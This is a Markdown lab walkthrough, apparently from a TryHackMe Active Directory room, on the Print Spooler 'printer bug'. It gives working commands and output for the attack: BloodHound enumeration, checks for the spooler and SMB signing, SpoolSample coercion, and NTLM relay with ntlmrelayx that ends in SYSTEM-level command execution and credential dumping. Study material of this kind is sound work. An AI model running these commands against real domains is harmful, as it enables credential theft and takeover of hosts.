137 lines
6.5 KiB
Markdown
137 lines
6.5 KiB
Markdown
|
|
|||
|
|
## General
|
|||
|
|
|
|||
|
|
Automated relays with machine accounts refer to a method where a machine or program is able to automatically access and control other machines or programs on the same Active Directory (AD) network using a machine account. This can be a vulnerability because it allows the machine or program to potentially access sensitive information or perform unauthorized actions on other machines or programs without the knowledge or consent of their users. Additionally, if the machine account is compromised, an attacker could use it to gain access to other machines or programs on the AD network. To mitigate this vulnerability, proper access controls and monitoring should be in place to limit the actions that machine accounts can perform, and to detect and respond to any suspicious activity.
|
|||
|
|
|
|||
|
|
|
|||
|
|
## The Printer Bug
|
|||
|
|
The printer bug is a "feature" of the MS-RPRN protocol (PrintSystem Remote Protocol), which allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitrary IP address.
|
|||
|
|
|
|||
|
|
This vulnerability is related to automated relays because it allows a machine or program to remotely access and control another machine or program on the same AD network using a machine account and valid AD credentials.
|
|||
|
|
|
|||
|
|
- Conditions
|
|||
|
|
Therefore, to exploit this, apart from machine account administrative privileges, we also need to meet the following four conditions :
|
|||
|
|
|
|||
|
|
1. A valid set of AD account credentials.
|
|||
|
|
2. Network connectivity to the target's SMB service.
|
|||
|
|
3. The target host must be running the Print Spooler service.
|
|||
|
|
4. The hosts must not have SMB signing enforced.
|
|||
|
|
|
|||
|
|
|
|||
|
|
Condition 1 and 2 have been met already. The only two we need to ensure works are conditions 3 and 4.
|
|||
|
|
|
|||
|
|
|
|||
|
|
## Commands
|
|||
|
|
|
|||
|
|
## Bloodhound
|
|||
|
|
Bloodhound Custome Query (find instances where a computer has the "AdminTo" relationship over another computer)
|
|||
|
|
```
|
|||
|
|
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
## Printer Bug
|
|||
|
|
Powershell (Query service (Win32_Printer) running on other machine in AD via WMI)
|
|||
|
|
```
|
|||
|
|
PS C:\> GWMI Win32_Printer -Computer MACHINE_DOMAIN
|
|||
|
|
|
|||
|
|
Location :
|
|||
|
|
Name : Microsoft XPS Document Writer
|
|||
|
|
PrinterState : 0
|
|||
|
|
PrinterStatus : 3
|
|||
|
|
ShareName :
|
|||
|
|
SystemName : THMSERVER2
|
|||
|
|
|
|||
|
|
Location :
|
|||
|
|
Name : Microsoft Print to PDF
|
|||
|
|
PrinterState : 0
|
|||
|
|
PrinterStatus : 3
|
|||
|
|
ShareName :
|
|||
|
|
SystemName : THMSERVER2
|
|||
|
|
```
|
|||
|
|
The output from the cmdlet verifies that the service is running. If we get an access denied error, you could perhaps attempt the PowerShell command of `Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc`
|
|||
|
|
|
|||
|
|
|
|||
|
|
SMB Signing
|
|||
|
|
|
|||
|
|
In order to relay the coerced authentication attempt, SMB signing should not be enforced. It should be noted that there is a difference between SMB signing being allowed and SMB signing being enforced.
|
|||
|
|
|
|||
|
|
To verify that THMSERVER1 and THMSERVER2 do not have SMB signing enforced, we can use Nmap
|
|||
|
|
```
|
|||
|
|
nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc
|
|||
|
|
|
|||
|
|
Nmap scan report for distributor.za.tryhackme.loc (172.31.1.201)
|
|||
|
|
Host is up (0.62s latency).
|
|||
|
|
|
|||
|
|
PORT STATE SERVICE
|
|||
|
|
445/tcp open microsoft-ds
|
|||
|
|
|
|||
|
|
Host script results:
|
|||
|
|
| smb2-security-mode:
|
|||
|
|
| 2.02:
|
|||
|
|
|_ Message signing enabled but not required
|
|||
|
|
|
|||
|
|
Nmap scan report for 172.31.1.202
|
|||
|
|
Host is up (0.38s latency).
|
|||
|
|
|
|||
|
|
PORT STATE SERVICE
|
|||
|
|
445/tcp open microsoft-ds
|
|||
|
|
|
|||
|
|
Host script results:
|
|||
|
|
| smb2-security-mode:
|
|||
|
|
| 2.02:
|
|||
|
|
|_ Message signing enabled but not required
|
|||
|
|
|
|||
|
|
Nmap done: 2 IP addresses (2 hosts up) scanned in 4.59 seconds
|
|||
|
|
```
|
|||
|
|
We can see that SMB signing is enabled but not enforced based on the output. This means all our conditions are met, and we can start the attack!
|
|||
|
|
|
|||
|
|
|
|||
|
|
Exploiting Authentication Relays
|
|||
|
|
|
|||
|
|
We will be using [SpoolSample](https://github.com/leechristensen/SpoolSample) to exploit the authentication relay. We will use Spoolsample.exe to coerce THMSERVER2 to authenticate to us on our machine and then [Impacket](https://github.com/SecureAuthCorp/impacket)'s [ntlmrelayx.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) to relay the authentication attempt THMSERVER1.
|
|||
|
|
|
|||
|
|
Setup NTLM relay (Attacking Machine)
|
|||
|
|
```
|
|||
|
|
python3.9 ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -debug
|
|||
|
|
```
|
|||
|
|
If we specify the hostname of THMSERVER1 instead of the IP, the host could request that we use Kerberos authentication instead of NTLM
|
|||
|
|
|
|||
|
|
SSH session over the THMSERVER1 (Already own)
|
|||
|
|
```
|
|||
|
|
C:\>SpoolSample.exe THMSERVER2.za.tryhackme.loc "Local Attacker IP"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
Output from the NTLM relay
|
|||
|
|
```
|
|||
|
|
thm$ python3.9 ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -c 'whoami /all' -debug
|
|||
|
|
[*] Servers started, waiting for connections
|
|||
|
|
[*] SMBD-Thread-5: Received connection from 172.31.1.202, attacking target smb://172.31.1.201
|
|||
|
|
[*] Authenticating against smb://172.31.1.201 as ZA/THMSERVER2$ SUCCEED
|
|||
|
|
[+] No more targets
|
|||
|
|
[*] SMBD-Thread-7: Connection from 172.31.1.202 controlled, but there are no more targets left!
|
|||
|
|
[+] No more targets
|
|||
|
|
[*] SMBD-Thread-8: Connection from 172.31.1.202 controlled, but there are no more targets left!
|
|||
|
|
[*] Service RemoteRegistry is in stopped state
|
|||
|
|
[*] Starting service RemoteRegistry
|
|||
|
|
[+] ExecuteRemote command: %COMSPEC% /Q /c echo whoami /all ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
|
|||
|
|
[*] Executed specified command on host: 172.31.1.201
|
|||
|
|
|
|||
|
|
USER INFORMATION
|
|||
|
|
|
|||
|
|
User Name SID
|
|||
|
|
=================== ========
|
|||
|
|
nt authority\system S-1-5-18
|
|||
|
|
|
|||
|
|
|
|||
|
|
GROUP INFORMATION
|
|||
|
|
|
|||
|
|
Group Name Type SID Attributes
|
|||
|
|
====================================== ================ ============ ==================================================
|
|||
|
|
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
|
|||
|
|
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
|
|||
|
|
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
|
|||
|
|
Mandatory Label\System Mandatory Level Label S-1-16-16384
|
|||
|
|
[...]
|
|||
|
|
```
|
|||
|
|
This output resembles what would happen if you used the `-c 'whoami /all'` command. However by specifying no command, you should now have performed a hashdump. These credentials can now be used to get a shell on the host!
|